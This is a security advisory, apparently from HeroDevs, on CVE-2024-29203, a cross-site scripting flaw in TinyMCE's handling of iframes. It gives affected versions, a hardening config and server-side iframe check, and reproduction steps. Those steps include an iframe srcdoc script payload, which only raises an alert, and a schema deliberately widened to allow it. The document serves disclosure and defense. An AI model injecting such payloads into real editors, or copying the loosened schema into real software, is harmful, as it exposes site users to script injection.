Overview
TinyMCE is a web-based JavaScript HTML WYSIWYG editor control.
A Cross-Site Scripting (XSS) vulnerability (CVE-2024-29203) has been identified in TinyMCE, which allows iframe elements containing malicious code to execute when inserted into the editor. Attacks are limited by same-origin browser protections, but could still trigger operations such as downloading of malicious assets.
Per OWASP: Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. An attacker can use XSS to send a malicious script to an unsuspecting user.
This issue affects TinyMCE versions less than 6.8.0.
Details
Module Info
- Product: TinyMCE
- Affected packages: tinymce
- Affected versions: <6.8.0 and <7.0.0*
- GitHub repository: https://github.com/tinymce/tinymce
- Published packages: https://www.npmjs.com/package/tinymce
- Package manager: npm
- Fixed in: OSS TinyMCE v6.8.0 and v7.0.0* and NES for TinyMCE v6.8.7
*: The fix is opt-in in v6.8.0 and is enabled by default in v7.0.0.
Vulnerability Info
This Medium-severity vulnerability is found in TinyMCE versions less than 6.8.0.
In versions 6.8.0 and later, the vulnerability can be resolved directly by setting the editor option sandbox_iframes to true; in the 6.8.x releases this option defaults to false. Starting with version 7.0.0 it defaults to true.
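The editor-side fix described above, with a server-side check that does not rely on it, as an added example (not TinyMCE's or HeroDevs' code). It assumes Node.js with no dependencies; hardenedEditorConfig, findUnsandboxedIframes and acceptEditorContent are helper names chosen for this example, and the sample HTML is constructed.

```javascript
// Added example, not TinyMCE's or HeroDevs' code. Assumes Node.js; the
// function names below are chosen for this example.

// Editor-side mitigation for TinyMCE >= 6.8.0: opt in to sandbox_iframes
// (6.8.x defaults to false; 7.0.0 turns it on). TinyMCE then adds a sandbox
// attribute to iframe elements, so a script in srcdoc is not executed.
function hardenedEditorConfig(selector) {
  return {
    selector,
    sandbox_iframes: true,
    // Keep the schema narrow: the reproduction needed srcdoc to be allowed
    // via extended_valid_elements, so do not grant it unless required.
    extended_valid_elements: 'iframe[src|sandbox]',
  };
}

// Server-side defense in depth: sandbox_iframes runs in the browser, so a
// request can still carry arbitrary HTML. Flag every <iframe> whose sandbox
// attribute is absent or grants allow-scripts.
const IFRAME_TAG = /<iframe\b([^>]*)>/gi;
// A standalone `sandbox` attribute, with or without a value.
const SANDBOX_ATTR =
  /(?:^|\s)sandbox(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+)))?(?=\s|\/|$)/i;

function findUnsandboxedIframes(html) {
  const findings = [];
  for (const m of html.matchAll(IFRAME_TAG)) {
    // [^>]* stops at the first '>', even one inside a quoted srcdoc value,
    // so the check fails closed: a sandbox attribute placed after such a
    // '>' is not seen and the tag is reported. This is a gate, not a
    // sanitizer; use a real HTML parser/sanitizer for the actual cleaning.
    const sb = SANDBOX_ATTR.exec(m[1]);
    if (!sb) {
      findings.push({ tag: m[0], reason: 'missing sandbox' });
      continue;
    }
    const tokens = (sb[1] ?? sb[2] ?? sb[3] ?? '').toLowerCase().split(/\s+/);
    if (tokens.includes('allow-scripts')) {
      findings.push({ tag: m[0], reason: 'sandbox grants allow-scripts' });
    }
  }
  return findings;
}

// Reject a submission when any iframe in it is unsandboxed.
function acceptEditorContent(html) {
  return findUnsandboxedIframes(html).length === 0;
}
```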
Steps To Reproduce
- Create a folder and name it public. Copy the TinyMCE files into this folder so that the path ./public/tinymce/tinymce.min.js is valid. For example, if you used npm to install tinymce, copy the contents of the folder node_modules/tinymce into public/tinymce.
- Create an HTML file next to the public folder that was just created. Add the self-hosted TinyMCE script to the <head> section. For example:
<script src="public/tinymce/tinymce.min.js"></script>
- In the body of the HTML file, add a section with a button and a textarea. This will be to display the XSS via iframe[srcdoc]. For example:
<div>
  <button onclick="injectIframePayload()">Inject iframe[srcdoc] Payload</button>
  <textarea id="editor"></textarea>
</div>
- Add an instance of TinyMCE in a <script> section. For example:
let editor;
tinymce.init({
  selector: '#editor',
  extended_valid_elements: 'iframe[src|srcdoc|sandbox]',
  setup: (data) => {
    editor = data;
  }
});
- In the same <script> section, add the function referenced by the button in the third step. For example:
function injectIframePayload() {
  const html = `<iframe srcdoc="<script>alert('CVE-2024-29203')<\/script>"></iframe>`;
  editor?.setContent(html);
}
- Run the application and click on the Inject iframe[srcdoc] Payload button. A popup will appear demonstrating the Cross-Site Scripting (XSS) vulnerability.
Proof Of Concept
A full reproduction with code similar to the above can be found here:
HTML injection XSS vulnerability POC
See the Pen "TinyMCE vulnerability: XSS vulnerability in Handling Iframes" by HeroDevs (@herodevs) on CodePen: https://codepen.io/herodevs/pen/xbGyjyv/299b960421ba116f94e660cfb2d3d4f8
Mitigation
TinyMCE versions below 6.8 are End-of-Life and will not receive any updates to address this issue. For more information see here.
Users of the affected components should apply one of the following mitigations:
- Migrate affected applications to a version of TinyMCE that includes the fix.
- Leverage a commercial support partner like HeroDevs for post-EOL security support.